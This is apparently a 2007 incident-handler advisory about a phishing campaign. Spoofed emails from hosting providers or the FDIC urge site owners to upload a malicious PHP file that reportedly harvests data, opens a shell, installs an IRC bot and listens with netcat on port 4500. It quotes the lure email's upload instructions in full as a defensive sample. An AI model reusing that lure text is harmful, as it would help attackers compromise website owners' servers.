Last Updated: 2007-02-19 22:15:50 UTC
by Patrick Nolan (Version: 5)
We received a report from Hugh Brower that there is a spammed email destined for whois contacts that contains a malicious php attachment. The email is spoofed to look like it's from the domain's hosting provider. The email attempts to trick the recipient into executing the attachment. Currently the attachment information is;
Attachment Name webguard.php
File size: 130990 bytes
Additional linformation developed shows that WHOIS contact information is NOT the only source of recipient email addresses. In one instance the recipient's email address was only on the website.
Johannes has a preliminary analysis of the first script reported above that shows that the script harvests critical system configuration information, emails information, sets up a shell, and dumps a perl irc bot. Look for a netcat listener on port 4500.
We've received additional reports (Thanks to Andy Sutton!), a variant shows that a spoofed sender is the US FDIC (Federal Deposit Insurance Corporation) , this email variants script attachment detail;
File Name vprotect.php
File size: 156686 bytes
**NOTE** Emails we have received contain virtually identical content instructions. The attachment and spoofed sender differ.
Matt Jonkman dropped us a note pointing out an identical attachment attack. See BleedingSnort. He reports "Initial hits we saw were on the 9th and earlier. The fbi is aware, the original sites in use were shut down.".
The email says;
"Subject: Hosting Regular Security Maintenance
Dear yourdomainhost valued Members
Regarding our new security regulations, as a part of our yearly maintenance we have provided a security guard script in the attachment.
So, to secure your websites, please use the attached file and (for UNIX/Linux Based servers) upload the file "webguard.php" in:
"./public_html" or (for Windows Based servers) in: "./wwwroot" in your site.
If you do not know how to use it, you can use the following instruction:
For Unix/Linux or Windows based websites that use PHP/CGI/PERL/ASP:
1) Download the attachment named "webguard.php"
2) Login to your site Control panel.
3) Open "File Manager" window.
4) Go through "Public_html" or "htdocs" (for UNIX/Linux Based servers),
but for Windows Based server, please Go through "wwwroot" directory.
5) Choose "Upload Files"
6) Upload the file "webguard.php"
7) Check its URL too "http://www.yoursite.com/webguard.php", if it is ok
Thank you for using our services and products. We look forward to providing you with a unique and high quality service.
The attack has targeted more than one domain but does not appear to be widespread at the moment. Additional details will be posted as they develop.
And thanks Handlers!